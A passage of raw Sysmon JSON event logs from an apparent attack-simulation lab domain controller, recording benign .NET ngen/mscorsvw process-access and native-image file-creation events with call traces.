C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.226","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.226\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.226","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.242\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.242","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.273\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.273","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.273\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.273","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:02.288\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:02.288","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00100F1A0B00}","TargetProcessId":"4728","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:03.273\r\nProcessGuid: {41C8662E-222E-5F25-0000-00100F1A0B00}\r\nProcessId: 4728\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\Microsoft.GroupPolicy.Targeting.dll\r\nCreationUtcTime: 2020-08-01 08:05:03.273","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:03.273","ProcessGuid":"{41C8662E-222E-5F25-0000-00100F1A0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\Microsoft.GroupPolicy.Targeting.dll","CreationUtcTime":"2020-08-01 08:05:03.273","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010071E0B00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010071E0B00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010071E0B00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010071E0B00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
